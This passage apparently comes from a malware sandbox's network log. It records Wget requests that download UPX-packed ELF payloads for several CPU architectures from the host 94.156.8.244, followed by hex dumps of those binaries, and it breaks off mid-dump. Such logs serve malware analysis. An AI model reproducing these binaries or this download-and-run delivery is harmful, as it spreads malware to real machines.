8c 51 99 97 8e ac 52 1f 1b 53 5a 40 7a 46 8a de b9 59 14 58 94 a6 fc 9d 83 5b 26 ab 5a ce dd 8b f7 94 ae 00 62 3e 39 c5 e6 77 63 a5 33 84 36 31 ab d9 da 38 64 f4 85 3f 7b 74 b0 13 25 9d 5e e8 e0 eb d8 89 e1 d7 ce 0a 1b 6f 30
                                                                  Data Ascii: ELF( 44 ( m m mQtdaUPX!ggj?Eh;#$o,Y;G%HmdioYSoRwi<X#-sSpLo>K,BpSdt[PmtO&eAG$oPZ$Xi%A%.B&{`34Q0o2?C.G6v l \QRSZ@zFYX[&Zb>9wc3618d?{t%^o0
                                                                  Mar 29, 2024 10:40:33.833389044 CET1286INData Raw: 71 db 3a 97 97 1b 5f 22 23 b2 8e f3 d9 15 e5 0b 10 2d f0 67 09 de 72 a4 aa 97 db c7 a3 cb a7 44 30 3d 84 cf f6 f3 3c 95 06 80 8b 69 98 ec 7d bd b9 e4 1a 7f 95 09 6c 0f 5e b3 9e cd 5b 53 d1 f6 0c 90 48 19 1f 91 d2 f6 c3 27 6a ff 1a 6e 73 41 d9 44
                                                                  Data Ascii: q:_"#-grD0=<i}l^[SH'jnsADm.WSP,t:x*Z,+Vay[.N1U4Q4IBiXkF(Nw]F>7+E1nZErA2tW+ib>G%yW}H
                                                                  Mar 29, 2024 10:40:33.833400965 CET1286INData Raw: dd cc 01 8a e0 ef e4 9c 67 2b 86 a0 98 46 ec 1c e1 6a c5 63 47 0a 33 fd 23 c2 72 a5 ee d0 8f e7 7b b2 d3 d6 e8 e7 c2 5a 06 6f ef 28 51 eb 9e d2 c7 6b a0 ec d2 3b fb 82 65 e2 b7 4a a5 e0 9e 5f 92 0e 16 d5 f6 36 c3 58 48 ec 17 dc e5 a9 c4 13 04 45
                                                                  Data Ascii: g+FjcG3#r{Zo(Qk;eJ_6XHE&VxaJCJ!2s;+i}YxNi9_lhuF:gP\J4FZ)~\qr}4!7'%APDZx3\!X[%^;7jFeY
                                                                  Mar 29, 2024 10:40:33.833410978 CET1286INData Raw: 8b cf e2 1c 81 d9 e7 d0 75 50 f8 4e 67 41 4b fb 77 d2 0c 92 38 85 1d 62 07 3f 49 57 be 18 02 31 ac bb ba 3e ac f6 b8 fe 14 86 ec 5f 61 29 42 b5 28 64 72 06 a9 b6 a7 df d1 c2 80 80 a2 4f 93 ba 39 68 75 06 9b ff 4d 27 6f f6 83 31 aa f2 2c c3 c7 4e
                                                                  Data Ascii: uPNgAKw8b?IW1>_a)B(drO9huM'o1,N"hD9/NjA</tmC0_YSeTOKRCJ;({fV(LuhPQ~<V9-OHM.b'^$$zRed-_?O(_xv
                                                                  Mar 29, 2024 10:40:33.833424091 CET1286INData Raw: 80 d1 6c b1 88 01 97 3b 2b 42 56 09 8e 06 ae ca 33 bc 81 10 bd c7 9c db 59 ed 72 1f c8 99 b9 47 69 8c 38 1d 54 44 a0 90 7f bc a4 c4 b4 c2 8b e0 b0 f1 06 b2 95 8d 47 1a a1 8b d5 ca be 25 cb 4e 01 f8 3e 8e 30 00 d6 22 15 df 3f a9 ef 4d 76 0d 83 cd
                                                                  Data Ascii: l;+BV3YrGi8TDG%N>0"?Mv[VN^KSR$OwO8RII&fBt_Td19H__RqAq"ItWb$_rAjc#pTCuI<\4BI5n5mM)KO$lEsZGY\9$RRcSa
                                                                  Mar 29, 2024 10:40:33.833435059 CET1286INData Raw: 38 bc 9e 8d 12 18 67 e9 d0 f3 9a 10 56 55 30 f7 8d 4a d1 08 41 be 55 1c 64 35 c1 ac 5e 18 b4 7b e4 c6 64 1f bf 88 49 e4 bb 55 3d 7d 98 ee 7a 6b 19 ff b0 c1 c4 7d 75 4e c5 e5 7d 6c f3 75 29 5a 9c 1f 91 d1 71 49 42 f0 83 15 56 cd db e1 b8 df 4d b4
                                                                  Data Ascii: 8gVU0JAUd5^{dIU=}zk}uN}lu)ZqIBVMxtA-!OmrWkKO1}7b&~e-q_b2n%0xCd+$gu84np#'OiF-8>)]&:g@
                                                                  Mar 29, 2024 10:40:33.833446980 CET1286INData Raw: 9b a0 a3 a5 33 5f bd 08 08 7d 0a 8d 11 b9 0a bd f0 0a 5b ca 85 3a 60 db 05 22 0a d5 eb de 9f 9b d2 51 89 86 c4 ec 90 5c a2 8e 06 06 13 0a 06 18 df cc e8 0d 8c 31 2b d9 36 39 93 89 14 b0 80 a6 8f a4 fe a8 b1 09 24 1f f5 46 f5 42 8f 56 ac 7a bb aa
                                                                  Data Ascii: 3_}[:`"Q\1+69$FBVzMF*S_NP6IqfQX5d<P,t9>lh(|UpWZ@0&2sZ+$hf[`.T{`YEXv<x|'T0
                                                                  Mar 29, 2024 10:40:33.833460093 CET1286INData Raw: 2f 90 72 6a a4 f3 bd 39 ee 72 6b bd fb bc 72 c0 b1 bc e4 fb 6f 0e f8 21 a5 7d 68 77 f5 ab da 70 c2 84 85 8c d2 de 18 42 b3 ff ab a1 20 b8 77 ce 7e 2a aa dc 73 63 d7 ce fc 94 24 d2 a3 9c 98 d1 69 32 d8 19 e7 7e 21 89 ee 13 13 64 21 1e de 92 37 46
                                                                  Data Ascii: /rj9rkro!}hwpB w~*sc$i2~!d!7Fy&GI9Tka)YfBmQ\.M7CEf<GeocH\T3/94u7GHXK`.r ^KvjAE0\\xL)<S`Fg!J<^$&.o
                                                                  Mar 29, 2024 10:40:33.833471060 CET1286INData Raw: 71 d0 b5 54 59 3a 25 c3 0f 51 17 ce f6 f7 ec 95 49 8a e7 9f 4f 48 4a 6d b0 fa 87 78 2a 39 fc 2b ec ec 73 f5 d3 57 a9 2e cd 89 94 7a 5c 69 3b 2a 22 5c 80 1f 44 db 54 4c c0 56 90 bc 00 3d f6 98 2e e6 a0 e9 46 2e fe 16 4b 2f b0 65 19 3f 50 f9 7d c1
                                                                  Data Ascii: qTY:%QIOHJmx*9+sW.z\i;*"\DTLV=.F.K/e?P}Gnmywr3F^|6DKizn0O^|MZ19JJ3EIM^H:4eTTj&uuCN8b:>N0Jrs3!|lv|D
                                                                  Mar 29, 2024 10:40:33.833506107 CET1286INData Raw: c7 25 2e 0d 85 6b b1 32 0a 5a 76 64 98 b1 c9 ea 5d b7 45 d8 0c 83 15 f8 89 8b b2 66 38 1b dc ad 09 28 2a 66 4a ec b6 dc 11 c7 64 35 e5 78 0e 08 22 33 55 e2 72 9b 07 f5 3c 02 cd ae bf 57 35 96 42 b4 77 68 0f 6e 35 b4 e5 de 98 dd 1c 4e de c2 01 7d
                                                                  Data Ascii: %.k2Zvd]Ef8(*fJd5x"3Ur<W5Bwhn5N}EO= oF{9r(_nm{||3ZO{O`1;~F&p2ee~y`eHl=UMeh/@CJlb)kB-G-wFi]
                                                                  Mar 29, 2024 10:40:34.034636021 CET1286INData Raw: 43 b1 eb 2a c4 94 0c e8 67 38 63 af c2 71 52 38 76 38 4c 23 e9 18 28 81 61 eb 0b bd e0 7e f3 05 e5 35 10 86 13 6c 45 d7 6e ea 59 f5 32 bc 41 a6 ef 5a 89 8f 9e 7b be 2b 64 09 06 8f 3b da 49 78 85 82 1e c9 45 7d 14 16 72 d2 66 72 3b 7a 02 57 b2 72
                                                                  Data Ascii: C*g8cqR8v8L#(a~5lEnY2AZ{+d;IxE}rfr;zWr^o*!`OI-mg}sY=`:XOP[S*j]3~-mAKQM)gCpY &*a{R@n|q]|fNm@e5hWb/r F1a


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  8192.168.2.234315494.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:34.965286970 CET155OUTGET /i586 HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:35.168574095 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 31580
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 06:30:42 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:35 GMT
                                                                  Data Raw: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 02 00 03 00 01 00 00 00 70 82 c0 00 34 00 00 00 00 00 00 00 00 00 00 00 34 00 20 00 03 00 28 00 00 00 00 00 01 00 00 00 00 00 00 00 00 10 c0 00 00 10 c0 00 53 7a 00 00 53 7a 00 00 05 00 00 00 00 10 00 00 01 00 00 00 c0 0d 00 00 c0 6d 06 08 c0 6d 06 08 00 00 00 00 00 00 00 00 06 00 00 00 00 10 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 d0 ad db 34 55 50 58 21 f0 07 0d 0c 00 00 00 00 8c 04 01 00 8c 04 01 00 94 00 00 00 5d 00 00 00 02 00 00 00 7f 3f 64 f9 7f 45 4c 46 01 00 02 00 03 00 0d 64 81 04 df 6d b3 dd 08 34 07 fc 02 1b 0b 20 19 28 00 0a 00 09 9e 7f 6d b2 00 2d 80 23 03 7c fa 00 00 05 fd 36 83 fd 13 10 00 1f 01 05 08 03 bc 02 7b 1f 64 b9 1f c0 ed 06 51 e5 74 64 0a 03 00 60 9a 23 06 04 00 00 00 00 00 00 00 48 ff e8 f9 00 00 0b 70 00 00 02 46 06 00 77 5f fb ff 55 89 e5 53 e8 06 00 00 18 81 c3 77 ff 06 0a 78 04 d0 58 5b ff 5d c0 fe 5d c3 8b 1c 24 c3 90 00 2b 83 ec 08 80 3d c0 82 05 08 ff ef ed ff 00 74 0c eb 35 83 c0 04 a3 24 80 0c ff d2 a1 06 8b 10 85 d2 75 eb b8 00 ff db b7 77 00 85 c0 74 10 2b 0c 68 7c 7a 16 e8 04 7f fb f7 83 c4 10 c6 8b 7d 6f bf 05 38 01 c9 53 8d b4 26 24 55 2a 54 f7 c7 fe 17 77 88 5a 81 c2 f4 fe 3b 15 52 6a 00 68 c4 2d 75 ee c8 33 40 c3 7e a1 10 64 1d 16 5f f7 3b 87 62 0d 14 ff d0 1e c9 ac 31 f7 bf fb ff ed 5e 89 e1 83 e4 f0 50 54 52 68 16 51 40 94 80 04 08 51 56 68 20 e0 04 64 fd dd 13 f6 b8 82 f4 cf 57 56 53 43 8a 5d 0c 0f b6 7d 10 fc b7 bf bb 03 75 18 23 7f 19 83 f8 ff 74 04 5f 7e
                                                                  Data Ascii: ELFp44 (SzSzmmQtd4UPX!]?dELFdm4 (m-#|6{dQtd`#HpFw_USwxX[]]$+=t5$uwt+h|z}o8S&$U*TwZ;Rjh-u3@~d_;b1^PTRhQ@QVh dWVSC]}u#t_~
                                                                  Mar 29, 2024 10:40:35.168618917 CET1286INData Raw: 0e 8d 65 f4 5b 5e 5f bb 4c f6 2e 09 8d b6 71 1b 48 75 4e 37 df ed db bd 8b 45 08 50 14 b4 cd 19 65 28 6a 09 0e 80 df fd 0f f6 26 c7 04 24 2f b4 66 89 f0 8b 5d 1c 25 ff 0e 53 50 89 f8 8b 67 9d fb d8 4d 14 0b 51 50 ff 12 b2 43 6a 26 31 37 f7 ee ee
                                                                  Data Ascii: e[^_L.qHuN7EPe(j&$/f]%SPgMQPCj&17Ewo_:Zu2t8t@;%u=n~<2$#/uqN[ QQ#RRad,*%=L$xdSp#
                                                                  Mar 29, 2024 10:40:35.168632030 CET1286INData Raw: 56 56 b7 68 e6 05 08 e1 6e 31 24 a4 92 04 9a 34 e0 42 25 2e 9e 1c 82 bf 5f 4b 14 bb c5 77 ff c9 c6 03 45 8a 9e 8d 73 26 88 53 09 7b 3a 56 22 48 f7 e4 56 43 02 0b 40 7d 7b b3 50 4a 1d 42 88 43 08 80 dc 33 00 74 06 7b df fe 0b b3 43 06 40 00 c6 43
                                                                  Data Ascii: VVhn1$4B%._KwEs&S{:V"HVC@}{PJBC3t{C@C/AeXas+DSMtn:@8)&EGt2^HFwJV`dFFrmg8?MQ-l%~"\8854ld`B]\^q~-L4mn&
                                                                  Mar 29, 2024 10:40:35.168657064 CET1286INData Raw: 8f 3b 5c 74 3a 57 57 34 78 7b c9 3a 5e e3 1a 21 8d fc 66 bb 4b 6e c4 90 79 20 ff 02 f3 16 94 98 35 c2 77 48 14 8d 78 01 8b 20 90 0f f1 91 3a 68 1d 20 d1 ff bf 23 00 75 45 2d 22 dd 4e 50 22 9d fc 3e c1 7b f7 bb 73 8f 8b 9a fc 43 8c 9f cd 64 39 df
                                                                  Data Ascii: ;\t:WW4x{:^!fKny 5wHx :h #uE-"NP">{sCd9uC=`aS"XGP{|NQS\S/boR_\t|D96uMeu][$#$KG(LQ,VS6XjVS#VSwIgLX>3]rrYEO@]/Q
                                                                  Mar 29, 2024 10:40:35.168668985 CET1286INData Raw: 74 04 24 08 6b 52 57 6b 50 74 98 c1 56 50 2b 89 ed 91 bb 78 43 89 04 0c 06 04 41 bd ea 80 69 e6 7b c5 74 f1 12 af 68 92 70 7b 8d 5a 28 d6 10 ba 4c ca d1 44 a3 d6 03 82 7d c0 14 79 08 e6 7c 19 19 29 2e 14 ce 01 4c 0c d2 74 66 4a 0b 3a 52 3e 74 d0
                                                                  Data Ascii: t$kRWkPtVP+xCAi{thp{Z(LD}y|).LtfJ:R>t[@dlmuVgK}2dCRPErSPG,5c~z!-%X)Fs!PdBPh?CIvPL:V!s @1hw@7AneKG2
                                                                  Mar 29, 2024 10:40:35.168711901 CET1286INData Raw: 42 05 52 cc b4 cf 1a 4f 92 9e 64 69 3d 50 1a 6a 16 37 db 84 a6 43 5a 4d 14 5d 28 53 22 19 e9 54 c7 37 f0 c3 31 c3 d0 fa 1d a0 db 21 ed 4e 80 f4 3c 9b 33 4e a4 87 92 52 47 38 d5 90 48 c6 10 f2 64 2e 74 52 5b 28 90 a1 92 a5 47 53 ce 72 c9 21 2d 40
                                                                  Data Ascii: BROdi=Pj7CZM](S"T71!N<3NRG8Hd.tR[(GSr!-@ShJ28NdBBEJjmI>uN89Cd9>R8GU<cJJWjSBQTRyPP;0C;sx#Pj\S{Ac#@4pcl,\A
                                                                  Mar 29, 2024 10:40:35.168724060 CET1286INData Raw: 11 fb 45 b0 f2 33 06 ac 07 68 8f d8 45 ec c7 02 6f 04 1a 77 03 06 f4 55 b0 6c fd 9b 8a 5d 9b ed f6 59 6c 15 a0 83 8b 4d a4 52 55 b4 03 68 f1 83 dc 4d ba 37 32 5d a8 cd 2e 3d 40 96 9a c5 75 9c ec 9e 8b 12 66 09 d7 27 75 9b 86 60 90 30 b1 b5 6a 0f
                                                                  Data Ascii: E3hEowUl]YlMRUhM72].=@uf'u`0j<R=E};$Nx$E^EE%?d'V]9}=uu[`V07vY~Mp%eL)(G!WHLm})=mokl
                                                                  Mar 29, 2024 10:40:35.168734074 CET1286INData Raw: 75 d7 29 c4 ae 05 df 84 14 1b 1e 5e 19 38 45 2b 58 3f fe 8b e1 02 44 23 49 92 76 15 3d 6e 6b 90 78 02 83 e9 ba c2 b8 c3 14 44 09 d7 f8 77 eb 49 75 05 be 0c ae 28 bb 5a bf 9d d3 c1 e8 10 5b ea f1 ea 10 13 16 8d 99 9b 2b c3 4f 04 c8 40 1f 10 27 18
                                                                  Data Ascii: u)^8E+X?D#Iv=nkxDwIu(Z[+O@'=.yJ~lVninS~otd8-_5Fp18dNt6&uZ7xo@)SD!F_8Pl(ZtQQ/pro+
                                                                  Mar 29, 2024 10:40:35.168746948 CET1286INData Raw: 3d 72 55 68 02 67 f9 3b 18 40 7f 8b 1f 43 04 40 0b 35 f4 c7 62 79 68 46 89 1c 90 8d 42 45 a3 ce f7 d9 e2 12 34 30 8f 6e 44 1d ea 08 68 b4 2a 4d 31 e9 0b 7d 7d 4f fb 80 e2 93 e0 1b f8 11 8c cd 1d fb ae be ab 7e d6 31 ed 8b 37 8d bd 26 e0 af bd 8f
                                                                  Data Ascii: =rUhg;@C@5byhFBE40nDh*M1}}O~17&Ee1B9t;H$G@uuzoPdXHn(ZXm/r<//GeKV$H[HdGlQ9-cQ6]IBPD([X;H+l]F70w
                                                                  Mar 29, 2024 10:40:35.168802023 CET1286INData Raw: 18 c4 52 77 25 01 dc ec 25 0c f7 cd 8a 45 a2 14 07 2a 3f 68 e3 fb ae 16 c9 96 8d b0 55 28 c4 c9 cb 66 b6 8d 0a 0b 29 b9 08 04 b0 05 e5 64 34 a1 21 f6 fc 08 c1 25 4b 28 50 63 d4 fc e1 8a c2 3d 75 d6 87 0f 87 9f 98 8f 64 3c 8b 03 c9 a0 0a d8 2a 98
                                                                  Data Ascii: Rw%%E*?hU(f)d4!%K(Pc=ud<*KWqt@|S=AI;[W+& pf+`dn(O(bfn: @1Z+3DLHXJ/Z1Z941(OYC4%mD1ccH*`6t
                                                                  Mar 29, 2024 10:40:35.371442080 CET1286INData Raw: 0f 9c 7f 07 d1 a4 85 47 8a 46 0a 19 88 ae 69 46 36 53 e9 09 b9 02 ba 03 e2 a3 19 03 bb 5c 50 d0 72 41 a0 16 c1 6b bb 88 5b d4 04 69 fa 8a 11 37 4b 25 b6 0e 88 8d a6 c8 42 89 0c 78 0f 98 a2 98 e9 22 10 86 8a 2e 21 51 ee 3f 1b 04 de d4 df b3 1f 14
                                                                  Data Ascii: GFiF6S\PrAk[i7K%Bx".!Q? ot@F*)_60hyAtJ(fU)6Zt[/A0N&B>At9T(h(h,Y:pEr8d<,dhd@d@>dh


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  9192.168.2.234316294.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:37.279622078 CET158OUTGET /powerpc HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:37.482800007 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 32544
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 06:30:49 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:37 GMT
                                                                  Data Raw: 7f 45 4c 46 01 02 01 03 00 00 00 00 00 00 00 00 00 02 00 14 00 00 00 01 00 10 6c 38 00 00 00 34 00 00 00 00 00 00 00 00 00 34 00 20 00 03 00 28 00 00 00 00 00 00 00 01 00 00 00 00 00 10 00 00 00 10 00 00 00 00 7e 20 00 00 7e 20 00 00 00 05 00 01 00 00 00 00 00 01 00 00 0a b8 10 03 0a b8 10 03 0a b8 00 00 00 00 00 00 00 00 00 00 00 06 00 01 00 00 64 74 e5 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 d6 f9 a9 aa 55 50 58 21 11 f4 0d 84 00 00 00 00 00 01 25 cc 00 01 25 cc 00 00 00 94 00 00 00 57 0e 00 00 00 1a 03 00 3f 91 45 84 68 34 8a 09 0a 40 62 ae a4 cb b1 c8 c4 fa 02 da 8b b1 9a c0 92 7a 92 29 d7 5b 98 51 12 89 17 b3 dc a0 e9 1b e2 34 2b 6a 9f 95 87 19 81 85 a1 8c 13 79 5b 0e 52 57 8a 6a 9c 6b c4 94 31 90 8c 2f bf 39 95 e4 5b 74 9b db 94 ab a7 45 6d f2 6f 00 00 01 1e cc 00 00 69 dd 0e d0 00 00 1a 03 00 4a 08 5b ee 03 df 28 fb d0 76 84 0e b3 d1 00 96 8f 2f 4d 4e 8c 35 38 07 53 21 8b 4f 3e 75 05 73 c1 22 d2 88 76 d8 fc fe fa f4 92 0a 86 4d 14 14 5f ef 8a d6 2f dd 7f 67 4d fe 05 33 f8 02 1c ea b0 12 66 13 ac 8b 91 ea d9 e5 6c 9c 7a 2d 34 06 09 5d 9b e9 e9 9a bf e7 54 75 85 cd cf d5 75 a9 67 38 a9 58 fa 74 6e 37 d0 a9 8a 11 23 6e a4 d9 2b 0f 8b 0f 4c 6a 3a a8 e2 74 c9 24 6e 5a b9 85 f8 17 1c cd f7 50 8f af 1e 30 93 db d2 e8 ee 58 67 dd dd 5c b1 41 32 b1 83 8a 85 23 ac b6 c5 ad 8a 9d 39 d0 8b 62 b4 51 26 42 10 f1 3b 71 e0 0b f4 30 1d 5c 2a 6e a2 02 aa d1 a5 ec 1e a7 19 85 f5 87 bb a2 ba 8e 97 9c d6 77 41 5b 56 33 2a 1f ed b6 5f 91 77 d4 8a 07 33 0e 3a 62 54 92 7d 3e e3 ee
                                                                  Data Ascii: ELFl844 (~ ~ dtQUPX!%%W?Eh4@bz)[Q4+jy[RWjk1/9[tEmoiJ[(v/MN58S!O>us"vM_/gM3flz-4]Tuug8Xtn7#n+Lj:t$nZP0Xg\A2#9bQ&B;q0\*nwA[V3*_w3:bT}>
                                                                  Mar 29, 2024 10:40:37.482811928 CET1286INData Raw: a9 01 42 9f 94 3f 2b 2d 64 67 93 46 5f d6 34 0a 1a f0 76 f8 62 42 93 6d 70 46 ba 57 fe 01 6c 67 3b 57 51 4c c7 69 ec 89 86 d5 2b 11 53 56 6a ec 8e 14 77 c2 de c6 a7 fd 41 60 a9 37 24 cc 64 44 47 c7 be d7 43 29 ba 7f dc 93 d3 b5 dd a2 ed 0d 68 3a
                                                                  Data Ascii: B?+-dgF_4vbBmpFWlg;WQLi+SVjwA`7$dDGC)h:GJ>y]6ND!e4g*IFGd0c'[#~^Q4GSAl0LW|{l2]rg^cejr!^mn)Fn`++{gG
                                                                  Mar 29, 2024 10:40:37.482821941 CET1286INData Raw: ab af 6c cc 41 a0 5d ec 5c 80 e6 ad ce 8f 8b 5a 13 74 c9 e0 e3 30 87 9a bb 8c 7a 20 10 f0 82 e4 17 92 47 07 e9 d1 29 66 c4 15 9b bd 49 7b ca 31 d0 fa 28 12 f4 f8 b8 a0 c7 ac e9 75 91 62 11 8c 84 3f e5 7d ce 74 f8 65 5e 24 5d 24 00 08 14 84 d7 ad
                                                                  Data Ascii: lA]\Zt0z G)fI{1(ub?}te^$]$]Cw*O08wnu]iy=q}&I4]D?,SAdj8>cp+;nzBZ/+0[9rd-B_tv!DY;WFg(@#
                                                                  Mar 29, 2024 10:40:37.482831955 CET1286INData Raw: eb e3 50 30 1d 16 1a ba 82 b3 ad 2b 6e cf 9a d2 91 f3 91 66 39 81 5b cb 48 6d 82 6e d2 92 bb d3 de da e4 df bf bf 8f 5d f6 b5 b1 d8 49 ab 07 d3 78 43 e9 c2 0b 2b fe 5e a4 08 a7 43 9d 5e 36 11 20 1c 2b e4 e4 92 ee 69 4b 67 f0 9f cc 2c f0 4a 86 54
                                                                  Data Ascii: P0+nf9[Hmn]IxC+^C^6 +iKg,JT`bPJ)d[=@hu.\VC?rN{}r"iMtN:<y)7v*RD9&!Z/V_%
                                                                  Mar 29, 2024 10:40:37.482842922 CET1286INData Raw: 4d f8 26 53 78 fc fd a4 2e 90 38 92 86 4e a8 d6 c7 f8 31 97 d1 ff d4 a3 96 17 04 9d 37 9e 09 cb f0 aa 28 b4 9a 2b 1d 4c d0 dd f3 59 c5 da dc 88 20 7c 01 e3 0e cb f2 62 6d 5b 9f 20 75 2f b4 65 40 59 6b 1b 69 4f 82 bc 3f 20 3c 22 5e db bc 1c 87 bf
                                                                  Data Ascii: M&Sx.8N17(+LY |bm[ u/e@YkiO? <"^Kp}t>.Gl%BHB2hkoj_fY|=Mz>aj(Q_D?zFW^ 05Kz;-Io+|hL\/`MpO;-Y&hX?oj'D=|)O2
                                                                  Mar 29, 2024 10:40:37.482855082 CET1286INData Raw: 28 e2 88 f9 be a6 cb 82 20 26 17 83 57 4d 91 4a b5 74 99 74 d1 40 f3 46 02 46 f2 3c 27 ee a7 cd 13 39 93 7a 0e d4 a9 7f e6 54 98 71 a7 e5 dd 8c 86 d4 08 ad 95 25 8e be d0 01 c1 28 c3 79 fb 55 e3 ba 9e 95 18 24 5c 7e a3 79 d9 91 e7 1f 65 4a 4c 37
                                                                  Data Ascii: ( &WMJtt@FF<'9zTq%(yU$\~yeJL7ZL!/\H?f0(?CMH/t[][n:4^[-'<TnRzy`IVHp/N8oki]Bn`/szQ'2naoGcm?]@
                                                                  Mar 29, 2024 10:40:37.482867002 CET1286INData Raw: ff 2a 1e a4 b3 35 ef b3 a3 55 be 8e 9c ce e7 f7 c0 76 d3 6d 2d 16 b1 44 54 f9 de 98 d3 c0 d4 5a 45 d4 39 10 c0 aa 91 3c 05 2e 62 0b ba 41 cc cb 0d 7a c7 fd 6a 34 82 f7 e3 30 1f b0 07 25 78 52 02 45 8b 0f 51 d9 68 e3 b9 f4 96 c5 fb cf 35 5e 7e ef
                                                                  Data Ascii: *5Uvm-DTZE9<.bAzj40%xREQh5^~SB(2RONc|i7xVM;^kW{~8 UzmF\wNnai]X$an\j#4YS^]k^R|/V{~
                                                                  Mar 29, 2024 10:40:37.482878923 CET1286INData Raw: f0 2b ee 9e 0c a2 c3 e3 11 bd c1 49 5d e7 5b 96 05 26 04 ec 98 52 25 e7 76 17 6d fd 38 ea 0e 1c 37 c3 af 5a 13 3b 20 de 07 93 73 db a2 15 4f c8 28 60 65 30 ca 9c d4 5f 44 98 82 71 b6 ef fb ca dd 4e b3 1a d4 25 d7 7e ae 90 4d 0f ec 9b af 7c 31 24
                                                                  Data Ascii: +I][&R%vm87Z; sO(`e0_DqN%~M|1$oi,;sk_C?aL|t=A,o~i,MhCEDU9>2?QFtrG@TXp`LH|Bv^$Y=4JG"C<#]}
                                                                  Mar 29, 2024 10:40:37.482891083 CET1286INData Raw: 1a 0a 5c 86 1d 2e 24 bb c9 03 5b b3 32 5c ee 11 5a 9c ee f2 43 b1 be 40 48 b6 17 d6 c6 71 5b ad 59 00 d0 12 97 bc b2 90 95 e6 9e 5d 69 a0 2f e3 35 73 19 34 f0 50 c4 2c b7 2a 5a a5 1f ec b8 a5 2f cc 0e d6 41 ab 76 b6 e8 17 d5 89 9e 7b 9c a7 49 c8
                                                                  Data Ascii: \.$[2\ZC@Hq[Y]i/5s4P,*Z/Av{IVZG}*`iX-8vcCJ9rfme<bNc<pFrL_cjR5<I36}&d5bK[wy2%u`r;unO1C[VM
                                                                  Mar 29, 2024 10:40:37.482903004 CET1286INData Raw: 3b 39 3a fa e5 b8 63 71 4a 27 b9 d0 8a 71 44 0d 9f bc 4c 09 35 68 4e 52 e3 e8 dc eb 1f e6 28 9e b1 85 53 c4 b7 34 87 29 60 ae 08 e3 66 5a 88 c2 a1 82 75 d0 e5 1a b6 ae a1 6c 3f 94 05 bf 28 2d 45 af 7f 87 6b d2 94 c5 8d 00 7c d2 c6 5b 1f 69 40 cd
                                                                  Data Ascii: ;9:cqJ'qDL5hNR(S4)`fZul?(-Ek|[i@/)oe2cwvd3G6"?CX4x`:K7A50.;=LD1G("GBh:>%07n/[_kb_ [PiPxA(u{Di6{PiO"
                                                                  Mar 29, 2024 10:40:37.685439110 CET1286INData Raw: d1 46 78 9e 13 b1 3e 7f 0b b8 42 43 67 2d 0f dd c9 2c f8 4f 3a 23 80 8f 3d db 17 28 50 af f4 4b 69 4e dd e2 ed eb 75 0b 5d 05 7b e4 67 7e c6 d9 f3 75 13 9c 38 fb 3b 09 77 55 ef 46 26 d2 62 83 ba 11 ee 74 94 94 99 21 d1 39 9e e0 1b 80 b9 13 63 dd
                                                                  Data Ascii: Fx>BCg-,O:#=(PKiNu]{g~u8;wUF&bt!9cVHS,iB|A*|, BF?]2}6&AsA{y}!&7|Pp0Ze4`de{_Bk:~'(sDz4/K:92<%w8Fl 7)~8


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  10192.168.2.234317294.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:39.293492079 CET154OUTGET /sh4 HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:39.497981071 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 67564
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 06:30:51 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:39 GMT
                                                                  Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 2a 00 01 00 00 00 a0 01 40 00 34 00 00 00 5c 06 01 00 09 00 00 00 34 00 20 00 03 00 28 00 0a 00 09 00 01 00 00 00 00 00 00 00 00 00 40 00 00 00 40 00 84 02 01 00 84 02 01 00 05 00 00 00 00 00 01 00 01 00 00 00 88 02 01 00 88 02 42 00 88 02 42 00 94 03 00 00 a0 ea 00 00 06 00 00 00 00 00 01 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 c6 2f e6 2f 22 4f f3 6e 00 a0 09 00 01 d1 02 c7 23 01 2a 40 98 00 00 00 01 d1 02 c7 23 01 2a 40 8c da 00 00 e3 6f 26 4f f6 6e 0b 00 f6 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 86 2f 96 2f 11 d9 e6 2f 90 61 22 4f 18 21 16 8f f3 6e 0f d8 82 61 12 62 28 22 08 8d 04 71 12 28 0b 42 09 00 82 61 12 62 28 22 f8 8f 04 71 09 d1 18 21 02 89 08 d4 0b 41 09 00 01 e1 10 29 e3 6f 26 4f f6 6e f6 69 f6 68 0b 00 09 00 1c 06 42 00 a0 02 42 00 00 00 00 00 84 02 41 00 09 00 09 00 e6 2f 12 d1 22 4f 